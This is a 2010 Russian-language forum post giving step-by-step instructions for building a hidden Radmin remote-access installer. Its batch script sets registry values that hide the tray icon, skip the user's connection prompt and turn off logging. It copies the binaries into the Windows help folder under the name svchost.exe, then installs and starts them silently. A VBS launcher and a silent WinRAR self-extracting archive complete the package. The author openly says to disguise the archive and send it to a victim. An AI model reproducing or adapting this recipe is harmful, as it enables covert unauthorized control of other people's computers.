У вентуры появился вопрос на счёт скрытого радмина сейчас всё популярно всем обьясню
в инете вы рабочий врядтли найдёте так как файл регистра палиться антивирями, ну почти всеми
исправляем этот недуг вместо обычного reg.reg файла забиваем струкнуру его в бат файл откуда и видёться сама установка радмина
приблезительно вот так будет выглядеть:
Цитата
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v LogFilePath /t REG_SZ /d c:\logfile.txt /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v NTAuthEnabled /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v EnableLogFile /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v FilterIp /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v AskUser /t REG_BINARY /d 00000000 /f
терь обьяснение к веткам:
Parameter - пороль на радмин хоть он и храниться в зашифрованом виде я "трулулу" вставил
Port - на какой порт будет ставиться тоже трулулу вместо хэша
менять выше перечисленые параметры трудоёмко т.к. они зашифрованы
далее просто, но немение важно:
AskUser - спраишвать у юсера при конекте, т.к. радмин скрытый ставим неспрашивать
DisableTrayIcon - показывать иконку в трее, тоже нет
далее в батнике пишем куды будем копировать сорцы самого радмина, а иммено:
AdmDll.dll
raddrv.dll
svchost.exe зы: может называться как угодно у меня так
копируем это всё командой типо
copy /y в %SYSTEMROOT%/help\
пример:
Цитата
copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
терь непосредственно устанавливаем сам радмин из уже всего готовенького:
Цитата
"%SYSTEMROOT%/help\svchost.exe" /install /silence
и запускаем
Цитата
"%SYSTEMROOT%/help\svchost.exe" /start
он сам прописываеться на автозагрузку, причём административную и обычному пользователю невидно
ещё нам нужен vbs скрипт для чего узнаете попойже
vbs:
Цитата
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ("наш_радмин.bat")
кстате наш_радмин.bat может быть и exe файлом, нужно всеголишь компилятор... и окошко батника мигать не будет перед глазами когда установка будет проходить
Впринцыпе разобрались с радмином терь как из 4х файлов сделать один, а очень легко)))
для этого нам потребуеться обычный архиватор WinRar который у всех есть надеюсь...
выбераем файлы и прописываем в коментарии что то в роде:
Цитата
Path=xak\
SavePath
Setup=st.vbs
Silent=1
Overwrite=1
переменые
Path - куды сейвим
Setup - что запускаем после распоковки, т.к. запуск bat файлов из архива заприщенно системой безопасности microsoft, пользуемся vbs который уже будет запускать bat файл ну или exe
Silent - не выдовать окон
Overwrite - перезаписывать все файлы без запроса
в исходе получаем 1 самораспоковывающийся архив с любым значком который нам понравиться, и при его запуске не будет происходить нечего, как будто нерабочий файл, ну или бат окошко мигать будет...(пользуйтесь компилятором!!!)
всё что осталось либо замоскировать его какнибуть и скинуть шобы скачали запустили
либо же тупо пихнуть его жертве
зы: работает токо при открытых портах, на инет у нас без hamachi или какойнить проги на подобе работать небудет! а у нас через vpn пользуйтесь скоко влезет!
в итоге у нас получаеться:
Цитата
@echo on
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v LogFilePath /t REG_SZ /d c:\logfile.txt /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v NTAuthEnabled /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d трулулу /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v EnableLogFile /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v FilterIp /t REG_BINARY /d 00000000 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters /v AskUser /t REG_BINARY /d 00000000 /f
copy /y "svchost.exe" "%SYSTEMROOT%/help\svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/help\raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/help\admdll.dll"
"%SYSTEMROOT%/help\svchost.exe" /install /silence
"%SYSTEMROOT%/help\svchost.exe" /start
кому помог или просто понравилось))) НЕ ЗАБЫВАЙТЕ ТЫКАТЬ СПАСИБО!!!
Сообщение отредактировал MoRoZko: 10 Октябрь 2010 - 19:13